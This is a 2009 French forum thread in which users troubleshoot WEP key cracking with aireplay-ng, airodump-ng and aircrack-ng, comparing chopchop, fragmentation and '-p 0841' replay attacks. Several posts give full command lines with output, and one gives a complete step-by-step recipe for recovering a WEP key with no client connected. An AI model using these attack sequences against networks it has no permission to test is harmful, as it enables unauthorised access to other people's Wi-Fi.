Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 02-01-2009 22:27:24

zeb
Membre
Inscription : 02-01-2009
Messages : 10

chopchop

Bonjour à tous

Tout d'abord une bonne et heureuse année!

J'ai essayé ce soir de cracker mon résau wifi. J'ai donc suivis le tutorial du site internet. Ca a marché très bien car j'avais une station connecté ou j'effectuais un téléchargement => beaucoup de packet.

Ensuite j'ai déconnecté cette station et j'ai essayé le tutorial chopchop. Mais ca marche pas
Je tape:

bt ~ # aireplay-ng rausb0 -1 30 -e Lafer -a 00:12:BF:1E:14:8C -h 00:22:B0:5F:94:8C
No source MAC (-h) specified. Using the device MAC (00:22:B0:5F:94:8C)
22:29:54  Waiting for beacon frame (BSSID: 00:12:BF:1E:14:8C) on channel 9

22:29:55  Sending Authentication Request (Open System)

22:29:57  Sending Authentication Request (Open System)

22:30:00  Sending Authentication Request (Open System)

22:30:03  Sending Authentication Request (Open System)

22:30:05  Sending Authentication Request (Open System)
22:30:06  Authentication successful
22:30:06  Sending Association Request
22:30:06  Association successful :-) (AID: 1)
22:30:21  Sending keep-alive packet
22:30:36  Sending Authentication Request (Open System)
22:30:36  Authentication successful
22:30:36  Sending Association Request

22:30:42  Sending Authentication Request (Open System)

22:30:44  Sending Authentication Request (Open System)
22:30:44  Authentication successful
22:30:44  Sending Association Request

22:30:49  Sending Authentication Request (Open System)

22:30:52  Sending Authentication Request (Open System)
22:30:52  Authentication successful
22:30:52  Sending Association Request
22:30:52  Association successful :-) (AID: 1)
22:31:07  Sending keep-alive packet
22:31:22  Sending Authentication Request (Open System)

22:31:25  Sending Authentication Request (Open System)
22:31:25  Authentication successful
22:31:25  Sending Association Request

22:31:31  Sending Authentication Request (Open System)

22:31:33  Sending Authentication Request (Open System)

22:31:35  Sending Authentication Request (Open System)
22:31:35  Authentication successful
22:31:35  Sending Association Request
22:31:35  Association successful :-) (AID: 1)
22:31:50  Sending keep-alive packet
22:32:05  Sending Authentication Request (Open System)

22:32:07  Sending Authentication Request (Open System)

22:32:09  Sending Authentication Request (Open System)

J'ai ensuite ça (ci dessus) qui s'affiche mais je n'ai pas de station qui apparait dans airodump-ng

J'ai quand même essayé de faire l'étape suivante mais elle ne s'est pas déroulée comme dans le tuto
bt ~ # aireplay-ng rausb0 -4 -e Lafer -a 00:12:BF:1E:14:8C -h 00:22:B0:5F:94:8C
22:32:54  Waiting for beacon frame (ESSID: Lafer) on channel 9
Found BSSID "00:12:BF:1E:14:8C" to given ESSID "Lafer".
Read 1745 packets...

Il continue à lire les packets mais il ne se passe rien d'autre.

A quoi cela peut-il être du?

D'avance merci

Bonne soirée

Dernière modification par zeb (02-01-2009 22:47:16)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 02-01-2009 23:43:30

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : chopchop

Bonsoir zeb, bienvenue sur le forum et bonne année wink

Ton attaque chopchop échoue car, soit tu es en channel hopping, soit tu captes très mal le point d'accès.

22:29:55  Sending Authentication Request (Open System)

22:29:57  Sending Authentication Request (Open System)

22:30:00  Sending Authentication Request (Open System)

22:30:03  Sending Authentication Request (Open System)

22:30:05  Sending Authentication Request (Open System)
22:30:06  Authentication successful

11 secondes avant de réussir à t'associer, ce n'est pas bon du tout. Cibles bien le canal de ton point d'accès, et rapproches toi si nécessaire afin d'améliorer la qualité du signal.

Pour finir, n'oublies pas que, comme précisé sur le tuto, ce type d'attaque ne fonctionne pas sur tous les points d'accès...

Hors Ligne

#3 03-01-2009 09:28:45

zeb
Membre
Inscription : 02-01-2009
Messages : 10

Re : chopchop

bonjour,
Alors j'ai défini un chanal d'écoute dans airodump donc je ne pense pas que ce soit ça le problème.

Je me suis raproché et j'ai ça:

bt ~ # aireplay-ng rausb0 -1 30 -e Lafer -a 00:12:BF:1E:14:8C -h 00:22:B0:5F:94:8C
23:57:55  Waiting for beacon frame (BSSID: 00:12:BF:1E:14:8C) on channel 9

23:57:55  Sending Authentication Request (Open System)
23:57:55  Authentication successful
23:57:55  Sending Association Request
23:57:55  Association successful :-) (AID: 1)
23:58:10  Sending keep-alive packet
23:58:25  Sending Authentication Request (Open System)
23:58:25  Authentication successful
23:58:25  Sending Association Request
23:58:25  Association successful :-) (AID: 1)
23:58:40  Sending keep-alive packet
23:58:55  Sending Authentication Request (Open System)
23:58:55  Authentication successful
23:58:55  Sending Association Request
23:58:55  Association successful :-) (AID: 1)
bt ~ # aireplay-ng rausb0 -4 -e Lafer -a 00:12:BF:1E:14:8C -h 00:22:B0:5F:94:8C
23:59:08  Waiting for beacon frame (ESSID: Lafer) on channel 9
Found BSSID "00:12:BF:1E:14:8C" to given ESSID "Lafer".
Read 882 packets...

Que dois-je faire? laisser tourner plus longtemps la première commande?

Merci:)

Hors Ligne

#4 03-01-2009 10:10:21

slax
Membre V.I.P.
Inscription : 30-12-2008
Messages : 250

Re : chopchop

C'est déjà beaucoup mieux. Moi aussi je teste cette attaque, Mais n'a ton pas besoin de station connectés pour réaliser cette attaque ?

Je vais tester chez moi sur mon réseau et je vous direz.

Hors Ligne

#5 03-01-2009 11:39:01

Grand Hibou
Membre d'honneur
Inscription : 08-06-2008
Messages : 1 280

Re : chopchop

A ce stade c'est un peu de patience oui, mais sinon teste l'attaque par fragmentation aussi (-5) si tu n'a pas de clients connec tés. L'une peux très bien marcher si l'autre cale sur un bssid. Par contre sans client c'est dur avec  une arp-replay (-3)


Un virus est un programme nocif.
Il est petit, rapide, prend peu de place en mémoire et sait se faire discret.

Windows n'est donc pas un virus, c'est un bug!

Hors Ligne

#6 03-01-2009 11:58:55

slax
Membre V.I.P.
Inscription : 30-12-2008
Messages : 250

Re : chopchop

Oui, je pense que ces deux attaques sont très employé quand il y a pas de station...

Hors Ligne

#7 03-01-2009 13:42:45

zeb
Membre
Inscription : 02-01-2009
Messages : 10

Re : chopchop

je fais l'attaque -5 sans avoir fait la -4?

Hors Ligne

#8 03-01-2009 13:49:55

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : chopchop

Comme te l'a conseillé Grand Hibou, tu peux tester la fragmentation si la chopchop ne donne pas de résultat. Lis bien le Tutoriel Crack de clé WEP sans client connecté au point d'accès: les attaques Chopchop et Fragmentation, Packetforge-ng et arp replay, tout y est expliqué en détails.

Hors Ligne

#9 03-01-2009 14:11:11

zeb
Membre
Inscription : 02-01-2009
Messages : 10

Re : chopchop

j'ai suivi ce tuto.

Quand je lance la commande airplay-ng -1 ...

En revenant dans le shell airodump-ng je ne vois pas qu'une station est apparue grace à cette commande comme je suis sensé le voir selon le tuto...

Hors Ligne

#10 03-01-2009 15:26:49

sardineeMule
Membre Irremplaçable
Inscription : 05-12-2008
Messages : 1 139
Site Web

Re : chopchop

Sans station frenchement l'attack la plus prolifique est la p0841 , pour moi c'est la meilleur quand le signal est faible (trop loin ou mauvais temp).
hier avec un peu de neige j'avais une meilleur reception qu'a labitude, surement du aux reflets des ondes sur la neige.

Dernière modification par sardineeMule (03-01-2009 15:33:05)


title.jpg N'oubliez pas le site http://www.crack-wifi.com/
  nux  hight.jpg

Hors Ligne

#11 03-01-2009 15:40:32

zeb
Membre
Inscription : 02-01-2009
Messages : 10

Re : chopchop

As tu un tuto pour cette attaque? merci beaucoup

Il s'agit de l'attaque airplay -2 c'es ça?

aireplay -2 -b 00:13:10:30:24:9C -n 100 -p 0841 \
    -h 00:09:5B:EB:C5:2B -c FF:FF:FF:FF:FF:FF ath0

a quoi corresponde les différente partie de la commande? d'avance merci!

j'ai trouvé ça ici: http://www.tuto-fr.com/tutoriaux/crack- … aque-2.php

Dernière modification par zeb (03-01-2009 15:48:53)

Hors Ligne

#12 03-01-2009 16:21:19

sardineeMule
Membre Irremplaçable
Inscription : 05-12-2008
Messages : 1 139
Site Web

Re : chopchop

Voila Mr
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:XX:XX:XX:XX:XX -h 11:22:33:44:55:66 wlan0
c'etait sur le forum une petite recherche serieuse tu l'aurais trouver wink


title.jpg N'oubliez pas le site http://www.crack-wifi.com/
  nux  hight.jpg

Hors Ligne

#13 03-01-2009 18:03:10

zeb
Membre
Inscription : 02-01-2009
Messages : 10

Re : chopchop

et je laisse tourner? jusque quand?

JE comprends pas le fonctionnement de la commande

Merci d'aider un noob

Dernière modification par zeb (03-01-2009 18:04:40)

Hors Ligne

#14 03-01-2009 19:22:42

Grand Hibou
Membre d'honneur
Inscription : 08-06-2008
Messages : 1 280

Re : chopchop

Regarde, toutes les explications des commandes sont là: interactive packet replay attack


Un virus est un programme nocif.
Il est petit, rapide, prend peu de place en mémoire et sait se faire discret.

Windows n'est donc pas un virus, c'est un bug!

Hors Ligne

#15 03-01-2009 21:01:02

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : chopchop

Ce qu'il faut savoir avec l'attaque -p 0841 c'est qu'elle ne fonctionne pas avec un rejeu d'arp. L'algorithme ptw ne sera donc pas utilisable sur le fichier de capture. Pour etre plus clair, il te faudra attendre d'avoir un million d'IVs ou plus pour du WEP 128 bits.

Les quelques tests que j'ai fait sur cette attaque m'ont montré qu'elle est assez longue, et qu'elle échoue bien souvent...

Hors Ligne

#16 04-01-2009 18:50:58

zeb
Membre
Inscription : 02-01-2009
Messages : 10

Re : chopchop

Bête question!

Quand je fais l'attaque aireplay-ng -1 30 e ...
Il faut que je la fasse tourner jusqu'au bout? ou quelque réponse suffise?

A quoi correspond le 30 j'ai déjà vu qu'il était parfois inscrit 0 à la place de 30

Hors Ligne

#17 04-01-2009 18:56:04

ex-tel
Banni(e)
Lieu : FRANCE
Inscription : 31-12-2008
Messages : 255

Re : chopchop

30 signifie toute les 30 sec, et 0 infini ! Suivant certaines attaques ca peut etre un nombre n de paquet (DeathAuth).


wifiso2.png

Hors Ligne

#18 09-01-2009 17:17:44

zeb
Membre
Inscription : 02-01-2009
Messages : 10

Re : chopchop

M1ck3y a écrit :

Ce qu'il faut savoir avec l'attaque -p 0841 c'est qu'elle ne fonctionne pas avec un rejeu d'arp. L'algorithme ptw ne sera donc pas utilisable sur le fichier de capture. Pour etre plus clair, il te faudra attendre d'avoir un million d'IVs ou plus pour du WEP 128 bits.

Les quelques tests que j'ai fait sur cette attaque m'ont montré qu'elle est assez longue, et qu'elle échoue bien souvent...

Pour info j'ai réussit à craquer une clé wep 128 bits avec 100.000 ivs avec l'algoritme ptw en 25min en utilisant l'attque -p 0841.
J'ai trouver un tuto su brico wifi

Crack de clé wep avec ou sans station métode -p 0841

    * airmon-ng start wlan0


(wlan0 est mon interface wifi, pour connaitre la votre iwconfig)

    * airodump-ng -w w wlan0


(on scan pour récupérer une cible)

    * airodump-ng -w w -c 10 --bssid xx:xx:xx:xx:xx:xx wlan0


(-c le channel ou se trouve le bssid visé, et --bssid le bssid visé)

    * iwconfig


(vous récuperez l'adresse mac de votre interface wifi)

Sans client, on ne connait pas l'adresse mac de la station, donc le filtrage mac doit ne pas être présent.

    * aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:XX:XX:XX:XX:XX -h 11:22:33:44:55:66 wlan0

(-b le bssid visé, -h l'adresse mac de votre carte, si il y a un filtrage mac mais qu'on a l'adresse mac de la station on utilise cette adresse avec au préalable une association)

    * aircrack-ng -P2 *.cap

(on le lance passé 20 000 pour une cle 64bits et 100.000 pour une clé 128bits datas dans airodump-ng car fonctionne avec ptw)

Dernière modification par zeb (09-01-2009 17:19:21)

Hors Ligne

#19 09-01-2009 17:53:15

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : chopchop

zeb a écrit :

Pour info j'ai réussit à craquer une clé wep 128 bits avec 100.000 ivs avec l'algoritme ptw en 25min en utilisant l'attque -p 0841.

Oui, mais il y avait un client connecté, pas vrai? Sans client connecté, cette attaque ne donne pas de très bons résultats, en tout cas c'est ce que j'ai constaté sur quelques tests.

Hors Ligne

#20 09-01-2009 20:48:59

zeb
Membre
Inscription : 02-01-2009
Messages : 10

Re : chopchop

non pas de client conecter!

J'avais essayé l'atte chopchop et par fragmentation avant et ça marchait pas!
J'ai lancer un terminal avec un aireplay-ng -1 puis l'attaque -p0841 sur un autre.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
3 729 25-05-2015 14:38:59 par kcdtv
6 1216 07-02-2014 21:57:46 par Arcyno
15 1256 09-08-2012 14:22:56 par Tahos
besoin d aide avec chopchop par moustaches
2 1616 25-03-2012 20:10:49 par moustaches
9 2163 04-01-2012 01:07:09 par Bilbo

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.029 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]